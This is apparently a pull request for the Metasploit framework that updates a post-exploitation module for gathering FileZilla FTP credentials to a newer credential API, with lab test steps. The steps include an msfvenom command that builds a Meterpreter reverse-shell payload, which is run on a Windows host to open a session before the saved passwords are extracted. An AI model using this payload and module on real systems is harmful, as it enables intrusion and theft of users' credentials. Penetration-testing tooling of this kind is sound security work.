### PR TITLE
Update filezilla_client_cred to use the new cred API

### DIFF
--- a/modules/post/multi/gather/filezilla_client_cred.rb
+++ b/modules/post/multi/gather/filezilla_client_cred.rb
@@ -114,6 +114,7 @@ class Metasploit3 < Msf::Post
     }
 
     credential_data = {
+      module_fullname: fullname,
       post_reference_name: self.refname,
       session_id: session_db_id,
       origin_type: :session,

--- a/modules/post/multi/gather/filezilla_client_cred.rb
+++ b/modules/post/multi/gather/filezilla_client_cred.rb
@@ -103,6 +103,43 @@ class Metasploit3 < Msf::Post
     return nil
   end
 
+
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      post_reference_name: self.refname,
+      session_id: session_db_id,
+      origin_type: :session,
+      private_data: opts[:password],
+      private_type: :password,
+      username: opts[:user]
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+  def is_base64?(str)
+    str.match(/^([A-Za-z0-9+\/]{4})*([A-Za-z0-9+\/]{4}|[A-Za-z0-9+\/]{3}=|[A-Za-z0-9+\/]{2}==)$/) ? true : false
+  end
+
+
+  def try_decode_password(str)
+    is_base64?(str) ? Rex::Text.decode_base64(str) : str
+  end
+
+
   def get_filezilla_creds(paths)
 
     sitedata = ""
@@ -155,14 +192,14 @@ class Metasploit3 < Msf::Post
           else
             source_id = nil
           end
-          report_auth_info(
-            :host  => loot['host'],
-            :port => loot['port'],
-            :sname => 'ftp',
-            :source_id => source_id,
-            :source_type => "exploit",
-            :user => loot['user'],
-            :pass => loot['password'])
+
+          report_cred(
+            ip: loot['host'],
+            port: loot['port'],
+            service_name: 'ftp',
+            username: loot['user'],
+            password: try_decode_password(loot['password'])
+          )
         end
       end
     end
@@ -214,7 +251,7 @@ class Metasploit3 < Msf::Post
       print_status("    Server: %s:%s" % [account['host'], account['port']])
       print_status("    Protocol: %s" % account['protocol'])
       print_status("    Username: %s" % account['user'])
-      print_status("    Password: %s" % account['password'])
+      print_status("    Password: %s" % try_decode_password(account['password']))
       print_line("")
     end
     return creds


### PR DESCRIPTION
This patch updates filezilla_client_cred to use the latest credential API.
- [x] Download [FileZilla Client](http://softlayer-dal.dl.sourceforge.net/project/filezilla/FileZilla_Client/3.11.0.1/FileZilla_3.11.0.1_win32-setup.exe)
- [x] Install FileZilla Client on Windows 7 (you cannot install it on Win XP)
- [x] Open FileZilla. Go to File -> Site Manager. Click on New Site, enter a fake host, port, do Normal Logon Type, supply a username and password. And finally, click OK.
- [x] Start msfconsole
- [x] Do: `workspace -a mozilla_test`
- [x] Do: `use exploit/multi/handler`
- [x] Do: `run`
- [x] Create a new payload exe: `./msfvenom -p windows/meterpreter/reverse_tcp lhost=[Your IP] lport=4444 -f exe -o /tmp/payload.exe`
- [x] Drag and drop payload.exe to Windows, and double click on it to get a session.
- [x] At the meterpreter prompt, do `run post/multi/gather/filezilla_client_cred`
- [x] The console should show you the password in plain-text
- [x] At the meterpreter prompt, do: `background`
- [x] Do: `creds`
- [x] You should see the credential like the following:

```
msf exploit(handler) > creds
Credentials
===========

host          service       public  private        realm  private_type
----          -------       ------  -------        -----  ------------
192.168.1.64  21/tcp (ftp)          myftppassword         Password
```
